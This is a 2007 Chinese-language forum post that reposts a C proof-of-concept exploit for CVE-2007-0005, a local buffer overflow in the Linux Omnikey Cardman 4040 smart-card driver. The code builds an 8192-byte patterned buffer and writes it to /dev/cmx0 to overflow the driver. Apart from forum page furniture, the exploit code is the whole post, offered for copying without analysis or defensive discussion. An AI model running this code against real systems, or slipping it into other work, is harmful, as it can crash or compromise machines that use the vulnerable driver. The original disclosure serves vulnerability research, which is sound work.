‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Linux Omnikey Cardman 4040 driver Local Buffer Overflow Exploit PoC

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3926 
精华
128 
积分
209876 
阅读权限
200 
性别
男 
在线时间
1117 小时 
注册时间
2007-10-23 
最后登录
2008-11-17 

资料收集奖 运营支持奖

楼主 发表于 2007-3-10 00:48  只看该作者

Linux Omnikey Cardman 4040 driver Local Buffer Overflow Exploit PoC

复制内容到剪贴板
代码:
/*
* Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
* Copyright (C) Daniel Roethlisberger <[email]daniel.roethlisberger@csnc.ch[/email]>
* Compass Security Network Computing AG, Rapperswil, Switzerland.
* All rights reserved.
* [url]http://www.csnc.ch/[/url]
*/

#include<sys/stat.h>
#include<fcntl.h>
#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
#include<errno.h>

int main(int argc, char *argv[]) {
  int fd, i, n;
  char buf[8192];

  /*
  * 0 1 2 3 4 5 6 7 8 9 a b c d e f ...
  * 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...
  */
  for (i = 0; i < sizeof(buf); i += 2) {
    buf[i]  = (char)(((i/2) & 0xFF00) >> 8);
    buf[i+1] = (char) ((i/2) & 0x00FF);
  }

  if ((fd = open("/dev/cmx0", O_RDWR)) < 0) {
    printf("Error: open() => %s\n", strerror(errno));
    exit(errno);
  }
  if ((n = write(fd, buf, sizeof(buf))) < 0) {
    printf("Error: write() => %s\n", strerror(errno));
    exit(errno);
  }
  printf("%d of %d bytes written\n", n, sizeof(buf));
  exit(0);
}

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题